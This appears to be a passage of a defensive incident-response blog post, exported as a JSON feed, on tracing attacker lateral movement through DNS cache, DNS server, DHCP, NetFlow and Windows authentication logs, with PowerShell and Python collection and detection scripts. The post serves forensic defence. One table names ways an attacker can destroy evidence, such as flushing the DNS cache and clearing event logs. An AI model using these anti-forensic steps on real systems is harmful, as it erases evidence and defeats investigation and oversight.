{
    "version": "https://jsonfeed.org/version/1",
    "title": "Inference Defense Blog",
    "home_page_url": "https://inferencedefense.com/academy/blog-internal/",
    "description": "Inference Defense Blog",
    "items": [
        {
            "id": "https://inferencedefense.com/academy/blog-internal/network-forensics-lateral-movement-dns-netflow-auth-logs",
            "content_html": "<blockquote>\n<p><em>The attacker has been in your network for six days. You have no packet capture. You have no IDS tap on east-west traffic. Your NDR license only covers the perimeter. The EDR on the compromised host was disabled on day two. What you do have: DNS server query logs, DHCP lease records, NetFlow from your core switches, and Windows Security event logs from your domain controllers. That is enough  if you know exactly what to look for, in what order, and how to correlate across sources that were never designed to talk to each other.</em></p>\n</blockquote>\n<hr>\n<h2 class=\"anchor anchorTargetStickyNavbar_Vzrq\" id=\"the-forensic-reality-most-ir-teams-face\">The Forensic Reality Most IR Teams Face<a href=\"https://inferencedefense.com/academy/blog-internal/network-forensics-lateral-movement-dns-netflow-auth-logs#the-forensic-reality-most-ir-teams-face\" class=\"hash-link\" aria-label=\"Direct link to The Forensic Reality Most IR Teams Face\" title=\"Direct link to The Forensic Reality Most IR Teams Face\" translate=\"no\">​</a></h2>\n<p>Full packet capture of internal east-west traffic is the gold standard for network forensics. It is also rarely present. The economics don't work for most organizations: capturing all internal traffic at 10Gbps generates roughly 75TB per day, and the storage, licensing, and operational overhead is prohibitive outside of the largest enterprises.</p>\n<p>What almost every organization does have  often without realizing its forensic value  is a set of indirect network artifacts that, when properly correlated, can reconstruct lateral movement with surprising fidelity. These artifacts are not designed for security. They exist for operational reasons: DHCP assigns IPs, DNS resolves names, NetFlow measures bandwidth, and authentication logs track access control. But together they form a network activity record that tells the story of which machine talked to which other machine, when, using which identity, and with what volume of data.</p>\n<p>This post covers:</p>\n<ol>\n<li class=\"\"><strong>DNS cache forensics</strong>  what survives on live endpoints, what the DNS server logs, and how to extract lateral movement indicators from both</li>\n<li class=\"\"><strong>DHCP log correlation</strong>  the IP-to-hostname-to-MAC mapping that is your network identity backbone</li>\n<li class=\"\"><strong>NetFlow analysis</strong>  reading flow records to detect internal scanning, lateral movement, and staged exfiltration</li>\n<li class=\"\"><strong>Windows authentication log correlation</strong>  mapping logon events to network events to build a movement timeline</li>\n<li class=\"\"><strong>Cross-source correlation</strong>  the JOIN operations that turn four incomplete pictures into one complete attack timeline</li>\n</ol>\n<p>Every technique includes exact commands, scripts, and queries you can execute during an active investigation.</p>\n<hr>\n<h2 class=\"anchor anchorTargetStickyNavbar_Vzrq\" id=\"part-1--understanding-what-evidence-each-source-preserves\">Part 1  Understanding What Evidence Each Source Preserves<a href=\"https://inferencedefense.com/academy/blog-internal/network-forensics-lateral-movement-dns-netflow-auth-logs#part-1--understanding-what-evidence-each-source-preserves\" class=\"hash-link\" aria-label=\"Direct link to Part 1  Understanding What Evidence Each Source Preserves\" title=\"Direct link to Part 1  Understanding What Evidence Each Source Preserves\" translate=\"no\">​</a></h2>\n<p>Before diving into the techniques, understand what each source captures, how long it survives, and what attackers do to destroy it. This determines your evidence collection priority during the first hour of IR.</p>\n<!-- -->\n<h3 class=\"anchor anchorTargetStickyNavbar_Vzrq\" id=\"evidence-volatility-matrix\">Evidence Volatility Matrix<a href=\"https://inferencedefense.com/academy/blog-internal/network-forensics-lateral-movement-dns-netflow-auth-logs#evidence-volatility-matrix\" class=\"hash-link\" aria-label=\"Direct link to Evidence Volatility Matrix\" title=\"Direct link to Evidence Volatility Matrix\" translate=\"no\">​</a></h3>\n<table><thead><tr><th>Source</th><th>Where Stored</th><th>Default Retention</th><th>Volatile?</th><th>Attacker Can Destroy?</th></tr></thead><tbody><tr><td>Client DNS cache</td><td>Memory (Windows DNS Client svc)</td><td>Until reboot or TTL expiry</td><td>Yes  highest</td><td><code>ipconfig /flushdns</code></td></tr><tr><td>DNS server query logs</td><td>EVTX / flat file on DNS server</td><td>Disabled by default</td><td>Medium</td><td>Clear log, disable logging</td></tr><tr><td>DHCP server logs</td><td><code>C:\\Windows\\System32\\dhcp\\</code></td><td>7 daily log files</td><td>Medium</td><td>Delete log files</td></tr><tr><td>DHCP lease database</td><td><code>C:\\Windows\\System32\\dhcp\\dhcp.mdb</code></td><td>Active leases only</td><td>Low</td><td>Requires DHCP server access</td></tr><tr><td>NetFlow records</td><td>Flow collector appliance/SIEM</td><td>Weeks to months</td><td>Low</td><td>Requires collector access</td></tr><tr><td>Windows auth logs (4624)</td><td>Security.evtx / SIEM</td><td>Per log size / SIEM</td><td>Medium</td><td>Event log clear (1102)</td></tr><tr><td>ARP table (router)</td><td>Router memory</td><td>Minutes to hours</td><td>Highest</td><td>Volatile by design</td></tr><tr><td>DNS passive records (SIEM)</td><td>SIEM if collected</td><td>Per SIEM retention</td><td>Low</td><td>Requires SIEM access</td></tr></tbody></table>\n<p><strong>Collection priority:</strong> DNS cache → DHCP DB → Auth logs → NetFlow. The first two expire or get destroyed fastest. NetFlow is typically the most durable artifact.</p>\n<hr>\n<h2 class=\"anchor anchorTargetStickyNavbar_Vzrq\" id=\"part-2--dns-cache-forensics\">Part 2  DNS Cache Forensics<a href=\"https://inferencedefense.com/academy/blog-internal/network-forensics-lateral-movement-dns-netflow-auth-logs#part-2--dns-cache-forensics\" class=\"hash-link\" aria-label=\"Direct link to Part 2  DNS Cache Forensics\" title=\"Direct link to Part 2  DNS Cache Forensics\" translate=\"no\">​</a></h2>\n<h3 class=\"anchor anchorTargetStickyNavbar_Vzrq\" id=\"21-the-client-dns-cache-a-map-of-recent-activity\">2.1 The Client DNS Cache: A Map of Recent Activity<a href=\"https://inferencedefense.com/academy/blog-internal/network-forensics-lateral-movement-dns-netflow-auth-logs#21-the-client-dns-cache-a-map-of-recent-activity\" class=\"hash-link\" aria-label=\"Direct link to 2.1 The Client DNS Cache: A Map of Recent Activity\" title=\"Direct link to 2.1 The Client DNS Cache: A Map of Recent Activity\" translate=\"no\">​</a></h3>\n<p>Every Windows host maintains a local DNS resolver cache  an in-memory table of recently resolved hostnames and their IP addresses. This cache is populated every time the host communicates with any other host by name. For lateral movement forensics, this is invaluable: <strong>it records the internal hostnames the compromised machine tried to reach</strong>, even if those connections happened days ago and left no other trace.</p>\n<p>The cache is managed by the DNS Client service (svchost.exe hosting <code>Dnscache</code>). It survives reboots only partially  some entries are persisted in the registry for pre-population on next boot.</p>\n<p><strong>Live extraction from a running host:</strong></p>\n<div class=\"language-cmd codeBlockContainer_Ckt0 theme-code-block\" style=\"--prism-color:hsl(212, 13%, 16%);--prism-background-color:hsl(256, 12%, 98%)\"><div class=\"codeBlockContent_QJqH\"><pre tabindex=\"0\" class=\"prism-code language-cmd codeBlock_bY9V thin-scrollbar\" style=\"color:hsl(212, 13%, 16%);background-color:hsl(256, 12%, 98%)\"><code class=\"codeBlockLines_e6Vv\"><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">:: Basic extraction  all cached entries</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">ipconfig /displaydns</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\" style=\"display:inline-block\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">:: Output format for a single entry:</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">::     Record Name . . . . . : DC02.corp.local</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">::     Record Type . . . . . : 1          &lt;- A record (IPv4)</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">::     Time To Live  . . . . : 1847       &lt;- seconds remaining before expiry</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">::     Data Length . . . . . : 4</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">::     Section . . . . . . . : Answer</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">::     A (Host) Record . . . : 10.10.1.15</span><br></span></code></pre></div></div>\n<p><strong>Structured extraction for analysis:</strong></p>\n<div class=\"language-powershell codeBlockContainer_Ckt0 theme-code-block\" style=\"--prism-color:hsl(212, 13%, 16%);--prism-background-color:hsl(256, 12%, 98%)\"><div class=\"codeBlockContent_QJqH\"><pre tabindex=\"0\" class=\"prism-code language-powershell codeBlock_bY9V thin-scrollbar\" style=\"color:hsl(212, 13%, 16%);background-color:hsl(256, 12%, 98%)\"><code class=\"codeBlockLines_e6Vv\"><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\"># Extract DNS cache as structured objects  far more useful than raw ipconfig output</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\"># Run on suspect host or via Invoke-Command for remote collection</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\" style=\"display:inline-block\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">$dnsCache = Get-DnsClientCache | Select-Object `</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">    Entry,          # The queried hostname</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">    RecordName,     # Actual DNS record name (may differ  CNAME targets)</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">    RecordType,     # 1=A, 28=AAAA, 5=CNAME, 12=PTR, 15=MX</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">    Status,         # Success, NotExist, etc.</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">    Section,        # Answer, Authority, Additional</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">    TimeToLive,     # Remaining TTL in seconds</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">    DataLength,</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">    Data            # The resolved IP address</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\" style=\"display:inline-block\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\"># Filter for internal IP ranges  lateral movement candidates</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">$internalRanges = @('10\\.', '172\\.(1[6-9]|2\\d|3[01])\\.', '192\\.168\\.')</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">$lateralCandidates = $dnsCache | Where-Object {</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">    $ip = $_.Data</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">    $isInternal = $internalRanges | Where-Object { $ip -match $_ }</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">    $isInternal -and $_.RecordType -eq 1  # A records only</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">}</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\" style=\"display:inline-block\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">$lateralCandidates | Sort-Object Entry | Format-Table -AutoSize</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\" style=\"display:inline-block\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\"># Export for comparison across multiple hosts</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">$lateralCandidates | Export-Csv \"dns_cache_$(hostname)_$(Get-Date -Format 'yyyyMMddHHmm').csv\" -NoTypeInformation</span><br></span></code></pre></div></div>\n<p><strong>Remote collection across all suspect hosts:</strong></p>\n<div class=\"language-powershell codeBlockContainer_Ckt0 theme-code-block\" style=\"--prism-color:hsl(212, 13%, 16%);--prism-background-color:hsl(256, 12%, 98%)\"><div class=\"codeBlockContent_QJqH\"><pre tabindex=\"0\" class=\"prism-code language-powershell codeBlock_bY9V thin-scrollbar\" style=\"color:hsl(212, 13%, 16%);background-color:hsl(256, 12%, 98%)\"><code class=\"codeBlockLines_e6Vv\"><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\"># Bulk DNS cache collection  run from IR workstation with admin rights</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">$suspectHosts = @(\"WORKSTATION01\", \"WORKSTATION02\", \"SERVER01\")</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">$allCacheEntries = @()</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\" style=\"display:inline-block\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">foreach ($computer in $suspectHosts) {</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">    try {</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">        $entries = Invoke-Command -ComputerName $computer -ScriptBlock {</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">            Get-DnsClientCache | Select-Object Entry, RecordType, TimeToLive, Data,</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">                @{N='SourceHost'; E={$env:COMPUTERNAME}}</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">        } -ErrorAction Stop</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">        $allCacheEntries += $entries</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">        Write-Host \"[+] Collected from $computer : $($entries.Count) entries\"</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">    } catch {</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">        Write-Warning \"[-] Failed on $computer : $_\"</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">    }</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">}</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\" style=\"display:inline-block\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\"># Find hosts that queried the same internal target  lateral movement breadcrumb</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">$allCacheEntries |</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">    Where-Object { $_.Data -match '^10\\.' -or $_.Data -match '^172\\.' } |</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">    Group-Object Data |</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">    Where-Object Count -gt 1 |  # IP seen in cache on multiple hosts</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">    ForEach-Object {</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">        Write-Host \"Shared target: $($_.Name)\" -ForegroundColor Yellow</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">        $_.Group | Select-Object SourceHost, Entry, TimeToLive | Format-Table</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">    }</span><br></span></code></pre></div></div>\n<h3 class=\"anchor anchorTargetStickyNavbar_Vzrq\" id=\"22-what-the-dns-cache-reveals-about-attack-techniques\">2.2 What the DNS Cache Reveals About Attack Techniques<a href=\"https://inferencedefense.com/academy/blog-internal/network-forensics-lateral-movement-dns-netflow-auth-logs#22-what-the-dns-cache-reveals-about-attack-techniques\" class=\"hash-link\" aria-label=\"Direct link to 2.2 What the DNS Cache Reveals About Attack Techniques\" title=\"Direct link to 2.2 What the DNS Cache Reveals About Attack Techniques\" translate=\"no\">​</a></h3>\n<p>Different lateral movement techniques leave distinct DNS cache signatures:</p>\n<!-- -->\n<p><strong>BloodHound collection is particularly distinctive in DNS cache:</strong></p>\n<div class=\"language-powershell codeBlockContainer_Ckt0 theme-code-block\" style=\"--prism-color:hsl(212, 13%, 16%);--prism-background-color:hsl(256, 12%, 98%)\"><div class=\"codeBlockContent_QJqH\"><pre tabindex=\"0\" class=\"prism-code language-powershell codeBlock_bY9V thin-scrollbar\" style=\"color:hsl(212, 13%, 16%);background-color:hsl(256, 12%, 98%)\"><code class=\"codeBlockLines_e6Vv\"><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\"># Detect BloodHound-style mass internal resolution burst in DNS cache</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\"># Key indicator: &gt;50 unique internal hostnames resolved in a single cache snapshot</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\" style=\"display:inline-block\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">$internalEntries = Get-DnsClientCache |</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">    Where-Object { $_.Data -match '^10\\.' -and $_.RecordType -eq 1 }</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\" style=\"display:inline-block\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\"># Group by subnet to see spread pattern</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">$subnetSpread = $internalEntries | ForEach-Object {</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">    $ip = $_.Data</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">    $octets = $ip.Split('.')</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">    \"$($octets[0]).$($octets[1]).$($octets[2]).0/24\"</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">} | Group-Object | Sort-Object Count -Descending</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\" style=\"display:inline-block\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">Write-Host \"Unique subnets contacted: $($subnetSpread.Count)\"</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">Write-Host \"Unique internal hosts resolved: $($internalEntries.Count)\"</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\" style=\"display:inline-block\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">if ($internalEntries.Count -gt 50) {</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">    Write-Warning \"INDICATOR: High internal hostname resolution count  possible AD enumeration\"</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">}</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">if ($subnetSpread.Count -gt 5) {</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">    Write-Warning \"INDICATOR: Resolutions span &gt;5 subnets  possible network discovery\"</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">}</span><br></span></code></pre></div></div>\n<h3 class=\"anchor anchorTargetStickyNavbar_Vzrq\" id=\"23-dns-server-query-logs-the-persistent-record\">2.3 DNS Server Query Logs: The Persistent Record<a href=\"https://inferencedefense.com/academy/blog-internal/network-forensics-lateral-movement-dns-netflow-auth-logs#23-dns-server-query-logs-the-persistent-record\" class=\"hash-link\" aria-label=\"Direct link to 2.3 DNS Server Query Logs: The Persistent Record\" title=\"Direct link to 2.3 DNS Server Query Logs: The Persistent Record\" translate=\"no\">​</a></h3>\n<p>The client cache is volatile. The DNS server query log is persistent  if enabled. Microsoft DNS Server on Windows Server can log all DNS queries received, but this is <strong>disabled by default</strong> and must be enabled explicitly.</p>\n<p><strong>Enable DNS debug logging (Windows DNS Server):</strong></p>\n<div class=\"language-powershell codeBlockContainer_Ckt0 theme-code-block\" style=\"--prism-color:hsl(212, 13%, 16%);--prism-background-color:hsl(256, 12%, 98%)\"><div class=\"codeBlockContent_QJqH\"><pre tabindex=\"0\" class=\"prism-code language-powershell codeBlock_bY9V thin-scrollbar\" style=\"color:hsl(212, 13%, 16%);background-color:hsl(256, 12%, 98%)\"><code class=\"codeBlockLines_e6Vv\"><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\"># Enable DNS analytical logging  captures all queries</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\"># Run on DNS server (typically a DC)</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\" style=\"display:inline-block\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\"># Method 1: Via DNS Management PowerShell module</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">Set-DnsServerDiagnostics -All $true -ComputerName \"DNS01.corp.local\"</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\" style=\"display:inline-block\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\"># Method 2: Specific settings  balance between detail and volume</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">Set-DnsServerDiagnostics `</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">    -Queries $true `           # Log all incoming queries</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">    -Answers $true `           # Log responses</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">    -SendPackets $true `       # Log sent packets</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">    -ReceivePackets $true `    # Log received packets</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">    -LogFilePath \"C:\\DNSDebugLog\\dns.log\" `</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">    -MaxMBFileSize 500 `       # 500MB before rotation</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">    -ComputerName \"DNS01.corp.local\"</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\" style=\"display:inline-block\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\"># Verify logging is active:</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">Get-DnsServerDiagnostics -ComputerName \"DNS01.corp.local\" |</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">    Select-Object Queries, Answers, LogFilePath, MaxMBFileSize</span><br></span></code></pre></div></div>\n<p><strong>DNS debug log format and parsing:</strong></p>\n<div class=\"language-text codeBlockContainer_Ckt0 theme-code-block\" style=\"--prism-color:hsl(212, 13%, 16%);--prism-background-color:hsl(256, 12%, 98%)\"><div class=\"codeBlockContent_QJqH\"><pre tabindex=\"0\" class=\"prism-code language-text codeBlock_bY9V thin-scrollbar\" style=\"color:hsl(212, 13%, 16%);background-color:hsl(256, 12%, 98%)\"><code class=\"codeBlockLines_e6Vv\"><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\"># Raw DNS debug log entry format:</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\"># Date Time Thread Context Internal(I)/External(E) Response/Send/Receive QueryType RecordType Data</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">#</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\"># Example entries from a lateral movement scenario:</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">2025-11-15 02:47:33 0D4 PACKET  000000AA3F012345 UDP Rcv 10.10.5.42 6D43 R Q [8081 DR  NOERROR] A (6)TARGET(4)corp(5)local(0)</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">2025-11-15 02:47:33 0D4 PACKET  000000AA3F012346 UDP Snd 10.10.5.42 6D43 R Q [8081 DR  NOERROR] A 10.10.1.55</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\" style=\"display:inline-block\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\"># This shows: host 10.10.5.42 queried for TARGET.corp.local at 02:47:33</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\"># The DNS server responded with 10.10.1.55</span><br></span></code></pre></div></div>\n<p><strong>Parse the DNS debug log for lateral movement indicators:</strong></p>\n<div class=\"language-python codeBlockContainer_Ckt0 theme-code-block\" style=\"--prism-color:hsl(212, 13%, 16%);--prism-background-color:hsl(256, 12%, 98%)\"><div class=\"codeBlockContent_QJqH\"><pre tabindex=\"0\" class=\"prism-code language-python codeBlock_bY9V thin-scrollbar\" style=\"color:hsl(212, 13%, 16%);background-color:hsl(256, 12%, 98%)\"><code class=\"codeBlockLines_e6Vv\"><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token comment\" style=\"color:hsl(212, 9%, 47%);font-style:italic\">#!/usr/bin/env python3</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\"></span><span class=\"token triple-quoted-string string\" style=\"color:hsl(139, 66%, 32%)\">\"\"\"</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token triple-quoted-string string\" style=\"color:hsl(139, 66%, 32%)\">Parse Windows DNS Server debug log for lateral movement indicators.</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token triple-quoted-string string\" style=\"color:hsl(139, 66%, 32%)\">Looks for: internal IP clients resolving many internal hostnames (discovery pattern),</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token triple-quoted-string string\" style=\"color:hsl(139, 66%, 32%)\">clients resolving hostnames they've never queried before, burst query patterns.</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token triple-quoted-string string\" style=\"color:hsl(139, 66%, 32%)\">\"\"\"</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\" style=\"display:inline-block\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\"></span><span class=\"token keyword\" style=\"color:hsl(356, 75%, 47%)\">import</span><span class=\"token plain\"> re</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\"></span><span class=\"token keyword\" style=\"color:hsl(356, 75%, 47%)\">import</span><span class=\"token plain\"> sys</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\"></span><span class=\"token keyword\" style=\"color:hsl(356, 75%, 47%)\">from</span><span class=\"token plain\"> collections </span><span class=\"token keyword\" style=\"color:hsl(356, 75%, 47%)\">import</span><span class=\"token plain\"> defaultdict</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\"></span><span class=\"token keyword\" style=\"color:hsl(356, 75%, 47%)\">from</span><span class=\"token plain\"> datetime </span><span class=\"token keyword\" style=\"color:hsl(356, 75%, 47%)\">import</span><span class=\"token plain\"> datetime</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\" style=\"display:inline-block\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\"></span><span class=\"token keyword\" style=\"color:hsl(356, 75%, 47%)\">def</span><span class=\"token plain\"> </span><span class=\"token function\" style=\"color:hsl(256, 54%, 50%)\">parse_dns_debug_log</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">(</span><span class=\"token plain\">log_path</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">)</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">:</span><span class=\"token 